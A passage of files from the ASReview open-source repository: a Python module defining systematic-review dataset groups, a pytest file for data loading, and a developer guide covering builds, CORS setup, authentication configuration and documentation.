to exclude from all groups.\n serialize: bool\n Make returned list serializable.\n raise_on_error: bool\n Raise error when entry point can't be loaded.\n\n Returns\n -------\n list:\n List with datasets as values.\n \"\"\"\n\n if include is not None and exclude is not None:\n raise ValueError(\"Cannot exclude groups when include is not None.\")\n\n if include is not None:\n if not is_iterable(include):\n include = [include]\n groups = include\n elif exclude is not None:\n exclude = exclude if is_iterable(exclude) else [exclude]\n groups = list(set(self.groups) - set(exclude))\n else:\n groups = self.groups.copy()\n\n dataset_groups = _entry_points(group=\"asreview.datasets\")\n\n group_list = []\n for group in groups:\n try:\n group_list.append(dataset_groups[group].load()())\n except Exception as err:\n # don't raise error on loading entry point\n if raise_on_error:\n raise err\n\n if serialize:\n dataset_list_ser = []\n for data_group in group_list:\n try:\n group_ser = []\n for dataset in data_group.datasets:\n group_ser.append(dataset.__dict__())\n dataset_list_ser.append(\n {\n \"group_id\": data_group.group_id,\n \"description\": data_group.description,\n \"datasets\": group_ser,\n }\n )\n except Exception as err:\n # don't raise error on loading entry point\n if raise_on_error:\n raise err\n\n return dataset_list_ser\n\n return group_list\n\n\nclass NaturePublicationDataGroup(BaseDataGroup):\n \"\"\"Datasets used in the paper Van de Schoot et al. 2020.\"\"\"\n\n group_id = \"benchmark-nature\"\n description = (\n \"Datasets used in the validation paper published\"\n \" in Nature Machine Intelligence (van de Schoot et al. 2021)\"\n )\n\n def __init__(self):\n meta_file = \"https://raw.githubusercontent.com/asreview/paper-asreview/master/index_v1.json\" # noqa\n datasets = _download_from_metadata(meta_file)\n\n super(NaturePublicationDataGroup, self).__init__(*datasets)\n\n\nclass SynergyDataSet(BaseDataSet):\n @property\n def filename(self):\n return self.dataset_id + \".csv\"\n\n @property\n def reader(self):\n return CSVReader\n\n def to_file(self, path=None):\n # download, build, and store to local file\n try:\n return sd.Dataset(self.dataset_id).to_frame().to_csv(path)\n except FileNotFoundError:\n tmp_synergy_folder = tempfile.mkdtemp()\n sd.download_raw_subset(self.dataset_id, path=tmp_synergy_folder)\n\n for d in sd.iter_datasets(path=tmp_synergy_folder):\n if d.name == self.dataset_id:\n return d.to_frame().to_csv(path)\n\n raise ValueError(\"Synergy dataset not found\")\n\n\nclass SynergyDataGroup(BaseDataGroup):\n \"\"\"Datasets available in the SYNERGY dataset.\"\"\"\n\n group_id = \"synergy\"\n description = \"SYNERGY datasets (asreview.ai/synergy)\"\n\n def __init__(self):\n # The following code was used to generate the metadata\n #\n # import synergy_dataset as sd\n # from pprint import pprint\n # meta_synergy = {}\n # for x in sd.iter_datasets():\n # meta_synergy[x.name] = {\n # \"title\": x.metadata[\"publication\"][\"display_name\"],\n # \"authors\": x.cite.split(\",\")[0] + \" et al.\",\n # \"topic\": x.metadata\n # [\"data\"][\"concepts\"][\"included\"][0][\"display_name\"],\n # \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n # \"reference\": x.metadata[\"publication\"][\"doi\"],\n # \"license\": \"See Synergy dataset\",\n # \"year\": x.metadata[\"publication\"][\"publication_year\"]\n # }\n # pprint(meta_synergy)\n\n synergy_metadata = {\n \"Appenzeller-Herzog_2019\": {\n \"authors\": \"Appenzeller‐Herzog et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/liv.14179\",\n \"title\": \"Comparative effectiveness of common \"\n \"therapies for Wilson disease: A \"\n \"systematic review and meta‐analysis of \"\n \"controlled studies\",\n \"topic\": \"Medicine\",\n \"year\": 2019,\n },\n \"Bos_2018\": {\n \"authors\": \"Bos et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jalz.2018.04.007\",\n \"title\": \"Cerebral small vessel disease and the risk of \"\n \"dementia: A systematic review and meta‐analysis of \"\n \"population‐based evidence\",\n \"topic\": \"Medicine\",\n \"year\": 2018,\n },\n \"Brouwer_2019\": {\n \"authors\": \"Brouwer et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.cpr.2019.101773\",\n \"title\": \"Psychological theories of depressive relapse and \"\n \"recurrence: A systematic review and meta-analysis \"\n \"of prospective studies\",\n \"topic\": \"Psychology\",\n \"year\": 2019,\n },\n \"Chou_2003\": {\n \"authors\": \"Chou et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jpainsymman.2003.03.003\",\n \"title\": \"Comparative efficacy and safety of long-acting oral \"\n \"opioids for chronic non-cancer pain: a systematic \"\n \"review\",\n \"topic\": \"Medicine\",\n \"year\": 2003,\n },\n \"Chou_2004\": {\n \"authors\": \"Chou et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jpainsymman.2004.05.002\",\n \"title\": \"Comparative efficacy and safety of skeletal muscle \"\n \"relaxants for spasticity and musculoskeletal \"\n \"conditions: a systematic review\",\n \"topic\": \"Medicine\",\n \"year\": 2004,\n },\n \"Donners_2021\": {\n \"authors\": \"Donners et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1007/s40262-021-01042-w\",\n \"title\": \"Pharmacokinetics and Associated Efficacy of \"\n \"Emicizumab in Humans: A Systematic Review\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Hall_2012\": {\n \"authors\": \"Hall et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1109/tse.2011.103\",\n \"title\": \"A Systematic Literature Review on Fault Prediction \"\n \"Performance in Software Engineering\",\n \"topic\": \"Computer science\",\n \"year\": 2012,\n },\n \"Jeyaraman_2020\": {\n \"authors\": \"Jeyaraman et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1177/1947603520951623\",\n \"title\": \"Does the Source of Mesenchymal Stem Cell Have an \"\n \"Effect in the Management of Osteoarthritis of \"\n \"the Knee? Meta-Analysis of Randomized Controlled \"\n \"Trials\",\n \"topic\": \"Medicine\",\n \"year\": 2020,\n },\n \"Leenaars_2019\": {\n \"authors\": \"Leenaars et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.5334/jcr.183\",\n \"title\": \"Sleep and Microdialysis: An Experiment and a \"\n \"Systematic Review of Histamine and Several Amino \"\n \"Acids\",\n \"topic\": \"Psychology\",\n \"year\": 2019,\n },\n \"Leenaars_2020\": {\n \"authors\": \"Leenaars et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.3390/ani10061047\",\n \"title\": \"A Systematic Review Comparing Experimental Design \"\n \"of Animal and Human Methotrexate Efficacy Studies \"\n \"for Rheumatoid Arthritis: Lessons for the \"\n \"Translational Value of Animal Studies\",\n \"topic\": \"Medicine\",\n \"year\": 2020,\n },\n \"Meijboom_2021\": {\n \"authors\": \"Meijboom et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1007/s40259-021-00508-4\",\n \"title\": \"Patients Retransitioning from Biosimilar TNFα \"\n \"Inhibitor to the Corresponding Originator After \"\n \"Initial Transitioning to the Biosimilar: A \"\n \"Systematic Review\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Menon_2022\": {\n \"authors\": \"Menon et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/10408444.2022.2082917\",\n \"title\": \"The methodological rigour of systematic reviews in \"\n \"environmental health\",\n \"topic\": \"Medicine\",\n \"year\": 2022,\n },\n \"Moran_2021\": {\n \"authors\": \"Moran et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/brv.12655\",\n \"title\": \"Poor nutritional condition promotes high‐risk \"\n \"behaviours: a systematic review and meta‐analysis\",\n \"topic\": \"Biology\",\n \"year\": 2021,\n },\n \"Muthu_2021\": {\n \"authors\": \"Muthu et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1097/brs.0000000000003645\",\n \"title\": \"Fragility Analysis of Statistically Significant \"\n \"Outcomes of Randomized Control Trials in Spine \"\n \"Surgery\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Nelson_2002\": {\n \"authors\": \"Nelson et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1001/jama.288.7.872\",\n \"title\": \"Postmenopausal Hormone Replacement Therapy\",\n \"topic\": \"Medicine\",\n \"year\": 2002,\n },\n \"Oud_2018\": {\n \"authors\": \"Oud et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1177/0004867418791257\",\n \"title\": \"Specialized psychotherapies for adults with borderline \"\n \"personality disorder: A systematic review and \"\n \"meta-analysis\",\n \"topic\": \"Psychology\",\n \"year\": 2018,\n },\n \"Radjenovic_2013\": {\n \"authors\": \"Radjenović et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.infsof.2013.02.009\",\n \"title\": \"Software fault prediction metrics: A systematic \"\n \"literature review\",\n \"topic\": \"Computer science\",\n \"year\": 2013,\n },\n \"Sep_2021\": {\n \"authors\": \"Sep et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1371/journal.pone.0249102\",\n \"title\": \"The rodent object-in-context task: A systematic review \"\n \"and meta-analysis of important variables\",\n \"topic\": \"Psychology\",\n \"year\": 2021,\n },\n \"Smid_2020\": {\n \"authors\": \"Smid et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/10705511.2019.1577140\",\n \"title\": \"Bayesian Versus Frequentist Estimation for Structural \"\n \"Equation Models in Small Sample Contexts: A \"\n \"Systematic Review\",\n \"topic\": \"Computer science\",\n \"year\": 2020,\n },\n \"Walker_2018\": {\n \"authors\": \"Walker et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.envint.2017.12.032\",\n \"title\": \"Human and animal evidence of potential \"\n \"transgenerational inheritance of health effects: An \"\n \"evidence map and state-of-the-science evaluation\",\n \"topic\": \"Biology\",\n \"year\": 2018,\n },\n \"Wassenaar_2017\": {\n \"authors\": \"Wassenaar et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1289/ehp1233\",\n \"title\": \"Systematic Review and Meta-Analysis of \"\n \"Early-Life Exposure to Bisphenol A and \"\n \"Obesity-Related Outcomes in Rodents\",\n \"topic\": \"Medicine\",\n \"year\": 2017,\n },\n \"Wolters_2018\": {\n \"authors\": \"Wolters et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jalz.2018.01.007\",\n \"title\": \"Coronary heart disease, heart failure, and the \"\n \"risk of dementia: A systematic review and \"\n \"meta‐analysis\",\n \"topic\": \"Medicine\",\n \"year\": 2018,\n },\n \"van_Dis_2020\": {\n \"authors\": \"van Dis et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1001/jamapsychiatry.2019.3986\",\n \"title\": \"Long-term Outcomes of Cognitive Behavioral Therapy \"\n \"for Anxiety-Related Disorders\",\n \"topic\": \"Psychology\",\n \"year\": 2020,\n },\n \"van_de_Schoot_2018\": {\n \"authors\": \"van de Schoot et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/00273171.2017.1412293\",\n \"title\": \"Bayesian PTSD-Trajectory Analysis with \"\n \"Informed Priors Based on a Systematic \"\n \"Literature Search and Expert Elicitation\",\n \"topic\": \"Psychology\",\n \"year\": 2018,\n },\n \"van_der_Valk_2021\": {\n \"authors\": \"Valk et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/obr.13376\",\n \"title\": \"Cross‐sectional relation of long‐term \"\n \"glucocorticoids in hair with anthropometric \"\n \"measurements and their possible determinants: \"\n \"A systematic review and meta‐analysis\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"van_der_Waal_2022\": {\n \"authors\": \"van der Waal et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jgo.2022.09.012\",\n \"title\": \"A meta-analysis on the role older adults with \"\n \"cancer favour in treatment decision making\",\n \"topic\": \"Medicine\",\n \"year\": 2022,\n },\n }\n\n datasets = [SynergyDataSet(k, **v) for k, v in synergy_metadata.items()]\n\n super(SynergyDataGroup, self).__init__(*datasets)\n\n\nclass BenchmarkDataGroup(BaseDataGroup):\n \"\"\"Datasets available in the benchmark platform.\n\n Deprecated\n \"\"\"\n\n group_id = \"benchmark\"\n description = \"DEPRECATED: Datasets available in the online benchmark platform\"\n\n def __init__(self):\n meta_file = \"https://raw.githubusercontent.com/asreview/systematic-review-datasets/master/index_v1.json\" # noqa\n datasets = _download_from_metadata(meta_file)\n\n super(BenchmarkDataGroup, self).__init__(*datasets)\n" }, { "alpha_fraction": 0.6651037931442261, "alphanum_fraction": 0.6651037931442261, "avg_line_length": 26.648147583007812, "blob_id": "972345e92802636b8f6266cf9fd47221e933bd82", "content_id": "4bf1d05d51d125ddfd6e4c340e3037d818b971b4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1493, "license_type": "permissive", "max_line_length": 85, "num_lines": 54, "path": "/tests/test_asdata.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom asreview import ASReviewData\n\n\[email protected](raises=ValueError, reason=\"Bad record_id\")\ndef test_bad_record_id():\n data_fp = Path(\"tests\", \"demo_data\", \"generic_bad_record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n assert len(np.unique(as_data.df.index.values)) == len(as_data)\n\n\ndef test_record_id():\n data_fp = Path(\"tests\", \"demo_data\", \"record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n # test is labels are numpy array\n assert isinstance(as_data.labels, np.ndarray)\n\n # test is index name is record_id\n assert as_data.df.index.name == \"record_id\"\n\n\ndef test_column_names_with_spaces():\n data_fp = Path(\"tests\", \"demo_data\", \"generic.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n data_fp_bad_cols = Path(\n \"tests\", \"demo_data\", \"generic_column_names_with_spaces.csv\"\n )\n as_data_bad_cols = ASReviewData.from_file(data_fp_bad_cols)\n\n assert_frame_equal(\n as_data.df[[\"title\", \"abstract\"]], as_data_bad_cols.df[[\"title\", \"abstract\"]]\n )\n\n\ndef test_asdata_init():\n data_fp = Path(\"tests\", \"demo_data\", \"generic.csv\")\n\n # data via pandas\n df = pd.read_csv(data_fp)\n df.index.name = \"record_id\"\n as_data_init = ASReviewData(df)\n\n # data via classmethod\n as_data = ASReviewData.from_file(data_fp)\n\n assert_frame_equal(as_data_init.df, as_data.df)\n" }, { "alpha_fraction": 0.7519187331199646, "alphanum_fraction": 0.7615557909011841, "avg_line_length": 49.08381652832031, "blob_id": "9dfa7b27a925fe69142ca8638a19555f2c2f829a", "content_id": "b0dea47ab6a5982f3cddaeae0bbd8521dd926e55", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17337, "license_type": "permissive", "max_line_length": 610, "num_lines": 346, "path": "/DEVELOPMENT.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# DEVELOPMENT\n\n## Build project\n\nBuild the project from source with the following code.\n\n\tpython setup.py compile_assets\n\tpython setup.py sdist bdist_wheel\n\n## Development workflow\n\n### Git Submodules\nSome demo datasets are included as a submodule. Directory [asreview/tests/citation-file-formatting](https://github.com/ottomattas/asreview/tree/development-v1/tests) is cloned from [citation-file-formatting](https://github.com/asreview/citation-file-formatting).\n\nExamples:\n- To clone the full repository with submodules in one line, add `--recursive` flag:\n\n\t```git clone --recursive git://github.com/asreview/asreview.git```\n\n- To update the submodule, you would still need to follow the contribution guide in the submodule repository. And then create a PR for the main repository with the updated submodule commit.\n\n### Back end\n\nInstall Python\n\nInstall the ASReview package\n\n\tpip install -e .[dev]\n\nStart the Python API server with the Flask development environment\n\n\texport FLASK_DEBUG=1\n\tasreview lab\n\nFor Windows, use\n\n\tset FLASK_DEBUG=1\n\tasreview lab\n\n#### Formatting and linting\n\nUse `flake8` to lint the Python code and format the code with `black`. Use\n`black[jupyter]` if you are editing the Jupyter notebooks. Use `isort` to\nsort the imports.\n\nInstall the linters and formatters with:\n\n```sh\npip install black[jupyter] flake8 flake8-isort isort\n```\n\nRun the following commands to lint and format:\n\n```sh\nblack .\nisort .\nflake8 .\n```\n\n### Front end\n\nInstall both [npm][1] and Python\n\nStart the Python API server with the Flask development environment. Before the front end development can be started, the back end has to run as well\n\n\texport FLASK_DEBUG=1\n\tasreview lab\n\nFor Windows, use\n\n\tset FLASK_DEBUG=1\n\tasreview lab\n\nNavigate to `asreview/webapp` and install the front end application with npm\n\n\tcd asreview/webapp\n\tnpm install\n\nThe user interface is written in [React][2]. Start the local front end application with npm\n\n\tnpm start\n\nOpen the web browser at `localhost:3000`\n\n**Important**: Ignore `localhost:5000`. You can also find a front end on `:5000` but this is not relevant for the current front end development step.\n\n[1]:\thttps://www.npmjs.com/get-npm\n[2]:\thttps://reactjs.org/\n\n### Front end development and connection/CORS issues\n\nIn development, when working on the front end, the front- and backend are strictly separated. It is assumed the Flask backend runs on port 5000 and the React front end on port 3000. Deviating from these ports will lead to connection or CORS (Cross-Origin Resource Sharing) issues.\n\nAs for CORS issues: it is necessary to precisely define the \"allowed origins\" in the backend. These origins must reflect the URL(s) used by the front end to call the backend. If correctly configured, they are added to the headers of the backend response, so they can be verified by your browser. If the list with origin-URLs doesn't provide a URL that corresponds with the URL used in the original request of the front end, your request is going to fail. __Setting the allowed origins can be done in the [config file](#full-configuration)__.\n\nYou can solve connection/CORS issues by doing the following:\n1. Start the backend and verify what port number it's running on (read the first lines of the output once you've started the backend in the terminal).\n2. Make sure the front end knows where it can find the backend. React reads a configuration `.env` file in the `/asreview/webapp` folder which tells it to use `http://localhost:5000/`. Override this config file by either adding a local version (e.g. `/asreview/webapp/.env.local`) in which you put the correct backend URL (do not forget the `REACT_APP_API_URL` variable, see the `.env` file) or change the URL in the `.env` file itself.\n3. If you are running the front end separate from the backend you need to adjust the CORS's 'allowed origins' parameter in the backend to avoid problems. You can do this by setting the front end URL(s) in the [optional parameters of the config file](#optional-config-parameters) under the \"ALLOWED_ORIGINS\" key.\n\nBe precise when it comes to URLs/port numbers! In the context of CORS `localhost` is different from `127.0.0.1`, although they are normally referring to the same host.\n\n❗Mac users beware: depending on your version of macOS you may experience troubles with `localhost:5000`. Port 5000 may be in use by \"Airplay Receiver\" which may (!) cause nondeterministic behavior. If you experience similar issues [switch to a different port](#optional-config-parameters).\n\n#### Formatting and linting\n\nPlease make use of Prettier (https://prettier.io/docs/en/install.html) to\nformat React/Javascript code. Use the following code to format all files in\nthe webapp folder.\n\n```\ncd asreview/webapp\nnpx prettier --write .\n```\n\n## Authentication\n\nIt is possible to run ASReview with authentication, enabling multiple users to run their\nprojects in their own separate workspaces. Authentication requires the storage of user\naccounts and link these accounts to projects. Currently we are using a small SQLite \ndatabase (asreview.development.sqlite or asreview.production.sqlite) in the ASReview \nfolder to store that information.\n\n### Bare bones authentication\n\nUsing authentication imposes more configuration. Let's start with running a bare bones\nauthenticated version of the application from the CLI:\n```\n$ python3 -m asreview lab --enable-auth --secret-key=<secret key> --salt=<salt>\n```\nwhere `--enable-auth` forces the application to run in an authenticated mode, \n`<secret key>` is a string that is used for encrypting cookies and `<salt>` is\na string that is used to hash passwords.\n\nThis bare bones application only allows an administrator to create user accounts by \nediting the database without the use of the ASReview application! To facilitate this,\none could use the User model that can be found in `/asreview/webapp/authentication/models.py`. Note that with this simple configuration it is not possible for a user to change forgotten passwords without the assistance of the administrator.\n\n### Full configuration\n\nTo configure the authentication in more detail we need to create a TOML file that contains all authentication parameters. The parameters in that TOML file will override parameters that were passed in the CLI. Here's an example:\n```toml\nDEBUG = true\nAUTHENTICATION_ENABLED = true\nSECRET_KEY = \"<secret key>\"\nSECURITY_PASSWORD_SALT = \"<salt>\"\nSESSION_COOKIE_SECURE = true\nREMEMBER_COOKIE_SECURE = true\nSESSION_COOKIE_SAMESITE = \"Lax\"\nSQLALCHEMY_TRACK_MODIFICATIONS = true\nALLOW_ACCOUNT_CREATION = true\nALLOW_TEAMS = false\nEMAIL_VERIFICATION = false\n\n[EMAIL_CONFIG]\nSERVER = \"<smtp-server>\"\nPORT = 465\nUSERNAME = \"<smtp-server-username>\"\nPASSWORD = \"<smtp-server-password>\"\nUSE_TLS = false\nUSE_SSL = true\nREPLY_ADDRESS = \"<preferred reply email address>\"\n\n[OAUTH]\n [OAUTH.GitHub]\n AUTHORIZATION_URL = \"https://github.com/login/oauth/authorize\"\n TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n CLIENT_ID = \"<GitHub client ID>\"\n CLIENT_SECRET = \"<GitHub client secret>\"\n SCOPE = \"\"\n \n [OAUTH.Orcid]\n AUTHORIZATION_URL = \"https://sandbox.orcid.org/oauth/authorize\"\n TOKEN_URL = \"https://sandbox.orcid.org/oauth/token\"\n CLIENT_ID = \"<Orcid client ID>\"\n CLIENT_SECRET = \"<Orcid client secret>\"\n SCOPE = \"/authenticate\"\n\n [OAUTH.Google]\n AUTHORIZATION_URL = \"https://accounts.google.com/o/oauth2/auth\"\n TOKEN_URL = \"https://oauth2.googleapis.com/token\"\n CLIENT_ID = \"<Google client ID>\"\n CLIENT_SECRET = \"<Google client secret>\"\n SCOPE = \"profile email\"\n```\nStore the TOML file on the server and start the ASReview application from the CLI with the\n`--flask-configfile` parameter:\n```\n$ python3 -m asreview lab --flask-configfile=<path-to-TOML-config-file>\n```\nA number of the keys in the TOML file are standard Flask parameters. The keys that are specific for authenticating ASReview are summarised below:\n* AUTHENTICATION_ENABLED: if set to `true` the application will start with authentication enabled. If the SQLite database does not exist, one will be created during startup.\n* SECRET_KEY: the secret key is a string that is used to encrypt cookies and is mandatory if authentication is required.\n* SECURITY_PASSWORD_SALT: another string used to hash passwords, also mandatory if authentication is required.\n* ALLOW_ACCOUNT_CREATION: enables account creation by users, either by front- or backend.\n* EMAIL_VERIFICATION: used in conjunction with ALLOW_ACCOUNT_CREATION. If set to `true` the system sends a verification email after account creation. Only relevant if the account is __not__ created by OAuth. This parameter can be omitted if you don't want verification.\n* EMAIL_CONFIG: configuration of the SMTP email server that is used for email verification. It also allows users to retrieve a new password after forgetting it. Don't forget to enter the reply address (REPLY_ADDRESS) of your system emails. Omit this parameter if system emails for verification and password retrieval are unwanted.\n* OAUTH: an authenticated ASReview application may integrate with the OAuth functionality of Github, Orcid and Google. Provide the necessary OAuth login credentails (for [Github](https://docs.github.com/en/apps/oauth-apps/building-oauth-apps/creating-an-oauth-app), [Orcid](https://info.orcid.org/documentation/api-tutorials/api-tutorial-get-and-authenticated-orcid-id/) en [Google](https://support.google.com/cloud/answer/6158849?hl=en)). Please note that the AUTHORIZATION_URL and TOKEN_URL of the Orcid entry are sandbox-urls, and thus not to be used in production. Omit this parameter if OAuth is unwanted.\n\n#### Optional config parameters\n\nThere are three optional parameters available that control what address the ASReview server listens to, and avoid CORS issues:\n\n```toml\nHOST = \"0.0.0.0\"\nPORT = 5001\nALLOWED_ORIGINS = [\"http://localhost:3000\"]\n```\nThe HOST and PORT determine what address the ASReview server listens to. If this deviates from `localhost` and port 5000, and you run the front end separately, make sure the [front end can find the backend](#front-end-development-and-connectioncors-issues). The ALLOWED_ORIGINS key must be set if you run the front end separately. Put in a list all URLs that your front end uses. This can be more than one URL. Failing to do so will certainly lead to CORS issues.\n\n### Converting an unauthenticated application into an authenticated one\n\nStart the application with authentication enabled for the first time. This ensures the creation of the necessary database. To avoid unwanted user input, shutdown the application.\n\nTo convert the old unauthenticated projects into authenticated ones, the following steps should be taken:\n\n1. Create user accounts for people to sign in.\n2. Convert project data and link the projects to the owner's user account.\n\nUnder the CLI sub commands of the ASReview application a tool can be found that facilitates these procedures:\n\n```\n$ asreview auth-tool --help\n```\n\n#### Creating user accounts\n\nThe first step is to create user accounts. This can be done interactively or by using a JSON string to bulk insert the accounts. To add user accounts interactively run the following command:\n```\n$ asreview auth-tool add-users --db-path ~/.asreview/asreview.production.sqlite\n```\n\nNote that the absolute path of the sqlite database has to be provided. Also note that if your app runs in development mode, use the `asreview.development.sqlite` database instead. The tool will prompt you if you would like to add a user account. Type `Y` to continue and enter an email address, name, affiliation (not required) and a password for every person. Continue to add as many users as you would like.\n\nIf you would like to bulk insert user accounts use the `--json` option:\n```\n$ asreview auth-tool add-users -j \"[{\\\"email\\\": \\\"[email protected]\\\", \\\"name\\\": \\\"Name of User\\\", \\\"affiliation\\\": \\\"Some Place\\\", \\\"password\\\": \\\"1234@ABcd\\\"}]\" --db-path ~/.asreview/asreview.production.sqlite\n```\nThe JSON string represents a Python list with a dictionary for every user account with the following keys: `email`, `name`, `affiliation` and `password`. Note that passwords require at least one symbol. These symbols, such as the exclamation mark, may compromise the integrity of the JSON string.\n\n#### Preparing the projects\n\nAfter creating the user accounts, the existing projects must be stored and linked to a user account in the database. The tool provides the `list-projects` command to prepare for this step in case you would like to bulk store all projects. Ignore the following commands if you prefer to store all projects interactively. \n\nWithout a flag, the command lists all projects:\n```\n$ asreview auth-tool list-projects\n```\nIf you add the `--json` flag:\n```\n$ asreview auth-tool list-projects --json\n```\nthe tool returns a convenient JSON string that can be used to bulk insert and link projects into the database. The string represents a Python list containing a dictionary for every project. Since the ID of the user account of \nthe owner is initially unknown, the `0` behind every `owner_id` key needs to be replaced with the appropriate owner ID. That ID number can be found if we list all user accounts with the following command:\n```\n$ asreview auth-tool list-users --db-path ~/.asreview/asreview.production.sqlite\n```\n\n#### Inserting and linking the projects into the database\n\nInserting and linking the projects into the database can be done interactively:\n```\n$ asreview auth-tool link-projects --db-path ~/.asreview/asreview.production.sqlite\n```\nThe tool will list project by project and asks what the ID of the owner is. That ID can be found in the user list below the project information.\n\nOne can also insert all project information by using the JSON string that was produced in the previous step:\n```\n$ asreview auth-tool link-projects --json \"[{\\\"folder\\\": \\\"project-id\\\", \\\"version\\\": \\\"1.1+51.g0ebdb0c.dirty\\\", \\\"project_id\\\": \\\"project-id\\\", \\\"name\\\": \\\"project 1\\\", \\\"authors\\\": \\\"Authors\\\", \\\"created\\\": \\\"2023-04-12 21:23:28.625859\\\", \\\"owner_id\\\": 15}]\" --db-path ~/.asreview/asreview.production.sqlite\n``` \n\n## Documentation\n\n### Sphinx docs\n\nDocumentation for the ASReview project is available on https://asreview.readthedocs.io/en/latest/.\nThe source files are available in the [`docs`](/docs) folder of this repository. The project makes\nuse of [Sphinx](https://www.sphinx-doc.org/) to convert the source files and docstrings into HTML\nor PDF files.\n\nInstall the dependencies for rendering the documentation with\n\n```\npip install -r docs/requirements.txt\n```\n\nNavigate into the `docs` folder and render the documentation (the HTML version) with\n\n```\nmake html\n```\n\nOpen the file `docs/build/html/index.html` in your web browser.\n\n### Broken links\n\nNavigate into the `docs` folder and check for broken links with:\n\n```\nmake linkcheck\n```\n\nExtra information: https://www.writethedocs.org/guide/tools/testing/#link-testing\n\n### Screenshots\n\nScreenshots are an important part of the ASReview documentation. When contributing screenshots,\nfollow the guidelines below.\n\n1. Open Developers Tools in your browser (e.g. Chrome or Firefox).\n2. Set device dimensions to **1280x800**.\n3. Capture screenshot with internal screenshot tool (preferred, see [example](https://www.deconetwork.com/blog/how-to-take-full-webpage-screenshots-instantly/)).\n4. [OPTIONAL] Crop relevant part. Keep ratio if possible.\n5. Resize image to **1280x800** maximum and **960x600** minimum.\n6. [OPTIONAL] Use a red box to highlight relevant components.\n\n## EXPERIMENTAL: One Click Deploy for ASReview LAB\n\nYou can deploy ASReview LAB right now in one click on any of these clouds providers:\n\n[<img src=\"https://aka.ms/deploytoazurebutton\" height=\"30px\">](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Fasreview%2Fasreview%2Fmaster%2Fazuredeploy.json)\n[<img src=\"https://deploy.cloud.run/button.svg\" height=\"30px\">](https://deploy.cloud.run)\n[<img 